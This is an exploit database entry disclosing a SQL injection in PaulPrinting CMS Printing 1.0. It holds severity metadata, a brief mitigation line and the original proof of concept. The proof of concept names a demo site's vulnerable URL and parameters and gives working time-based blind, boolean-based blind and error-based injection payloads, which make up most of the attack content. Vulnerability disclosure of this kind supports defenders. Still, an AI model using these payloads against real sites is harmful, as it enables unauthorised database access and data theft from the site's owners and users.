PaulPrinting CMS Printing 1.0 - SQL Injection

vendor:

PaulPrinting CMS Printing Solutions

by:

Mehmet Onder Key

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PaulPrinting CMS Printing Solutions

Affected Version From: 1

Affected Version To: 1

Patch Exists: N/A

Related CWE: N/A

CPE: a:codepaul:paulprinting_cms_printing_solutions

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2018

PaulPrinting CMS Printing 1.0 – SQL Injection

Any visitor can run code to exploit css and sql vulnerabilities in the products and order sections. An example parameter with a demo site is provided, as well as time-based blind SQL, boolean-based blind SQL, and error-based SQL payloads. All parameters are affected.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection
# Exploit Date: 2018-05-19
# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365
# Author: Mehmet Onder Key
# Version: 1.0
# Tested On: Linux

# 1. Description
# Any visitor can run code to exploit css and sql vulnerabilities in the
# products and order sections.

# 2. Proof of Concept
# Example parameter with demo site :  http://demo.codepaul.com/
# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf&
# paper=300g_ma&refinement=lamco

# Time-Based Blind SQL Payload:
format=keyney+akkus') OR SLEEP(5)-- DLea

# Boolean-Based Blind SQL Payload:
refinement=were') OR NOT 4134=4134#

# Error-Based SQL Payload
paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz
etc... (all parameter is effected -pricelist)